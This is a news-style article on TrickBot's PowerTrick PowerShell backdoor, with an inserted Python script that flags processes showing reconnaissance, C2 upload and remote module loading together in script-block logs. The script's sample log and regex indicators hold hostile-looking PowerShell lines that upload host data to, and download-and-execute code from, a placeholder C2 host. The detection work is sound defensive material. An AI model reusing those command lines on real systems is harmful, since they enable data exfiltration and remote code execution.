The TrickBot hacking group is back in the news with a new backdoor Trojan called PowerTrick. The TrickBot hacking group tends to target businesses and institutions involved in the financial sector. The PowerTrick backdoor Trojan is not used as a first-stage payload. Instead, the TrickBot hackers deploy it at a later stage of the campaign, as it ensures further control over the infected system. The TrickBot hacking group consists of very experienced individuals who know what they are doing when it comes to cybercrime. It is no surprise that, once again, they are going after high-end targets. Of course, to carry out a successful campaign against such targets, the TrickBot group relies on very high-quality hacking tools that use impressive evasion techniques.
The PowerTrick Trojan Is Very Flexible and Threatening
After detecting the activity of the PowerTrick backdoor Trojan on a compromised system, malware analysts studied it and found that to launch the threat, the TrickBot hackers are using the Windows PowerShell. Upon execution, the PowerTrick Trojan would begin collecting data regarding the compromised system’s hardware and software. Once the information in question is gathered successfully, the PowerTrick backdoor Trojan would transfer it to its operators’ C&C (Command & Control) server. To make the PowerTrick Trojan more flexible, the TrickBot hacking group has used the Metasploit framework. To add more flexibility, they also have employed custom-developed PowerShell tools. Doing this ensures that the operators of the PowerTrick backdoor Trojan can execute a very wide range of activities on the compromised system by loading and unloading different modules that serve different purposes.
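The behaviour chain described above (a PowerShell-launched stage that enumerates the host, pushes the result to a C&C server, and then pulls further modules) is something a defender can hunt for in PowerShell script-block logging. The following is an added example, not code from the article or from any vendor: it groups constructed script-block log lines by process and flags a process only when all three stages appear together, which keeps a lone inventory script or a single download from raising an alert. The log format, indicator patterns and sample lines are assumptions for illustration.

```python
"""Flag PowerShell processes whose script blocks show recon, C2 transfer
and remote module loading together. Constructed example; the log format
(event|pid|user|script_block) and the indicator regexes are assumptions."""
import re
from collections import defaultdict

# Hypothetical indicator classes, one per stage of the described chain.
INDICATORS = {
    "recon": re.compile(
        r"Get-WmiObject|Get-CimInstance|Get-ComputerInfo|"
        r"Win32_(?:ComputerSystem|Processor|OperatingSystem)", re.I),
    "exfil": re.compile(
        r"Net\.WebClient|UploadString|UploadData|Invoke-RestMethod|Invoke-WebRequest", re.I),
    "module_load": re.compile(
        r"\bIEX\b|Invoke-Expression|DownloadString|FromBase64String", re.I),
}

# Constructed sample log lines; not real telemetry. PID 1234 shows the full
# chain, 5678 is a benign inventory script, 9012 is a plain download.
SAMPLE_LOG = """\
4104|1234|svc_app|$c = Get-WmiObject Win32_ComputerSystem; $o = Get-WmiObject Win32_OperatingSystem
4104|1234|svc_app|$w = New-Object Net.WebClient; $w.UploadString('http://c2.example.invalid/p', ($c | ConvertTo-Json))
4104|1234|svc_app|IEX $w.DownloadString('http://c2.example.invalid/m/next.ps1')
4104|5678|admin|Get-ComputerInfo | Out-File C:\\inventory\\host.txt
4104|9012|dev|Invoke-WebRequest https://files.example.invalid/tool.zip -OutFile tool.zip
"""

def parse(line):
    """Split one pipe-delimited record; the script block may itself contain pipes."""
    event, pid, user, block = line.split("|", 3)
    return {"event": event, "pid": int(pid), "user": user, "block": block}

def classify(block):
    """Return the set of stage names whose indicators match this script block."""
    return {name for name, rx in INDICATORS.items() if rx.search(block)}

def stages_by_pid(log_text):
    """Accumulate matched stages per process across all of its script blocks."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        if line.strip():
            rec = parse(line)
            seen[rec["pid"]] |= classify(rec["block"])
    return dict(seen)

def flag_full_chain(log_text):
    """PIDs that exhibit every stage; single-stage activity is left alone."""
    return {pid: sorted(s) for pid, s in stages_by_pid(log_text).items()
            if s == set(INDICATORS)}

if __name__ == "__main__":
    print(flag_full_chain(SAMPLE_LOG))
```

Tuning the regexes to your own baseline (for example an inventory tool that legitimately uploads results) is the practical part; the per-process correlation is what separates this from a keyword match.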
Apart from the aforementioned capabilities, the PowerTrick backdoor Trojan also is able to transfer itself to network drives, as well as to attached systems. This nasty backdoor Trojan also is capable of planting additional malware on the infected system. The PowerTrick threat also can wipe out files that are no longer needed to reduce its footprint. Furthermore, the PowerTrick malware is capable of fully uninstalling itself from the compromised machine, which means that the victims may never even know that their systems have been infected. The fact that the PowerTrick backdoor Trojan can move laterally makes it threatening, particularly because it can compromise its target via another infected system connected to the same network.
The TrickBot group is a very prominent name in the world of cybercrime. These hackers are highly skilled and very persistent. They are known to update their tools and add new malware to their arsenal on a regular basis.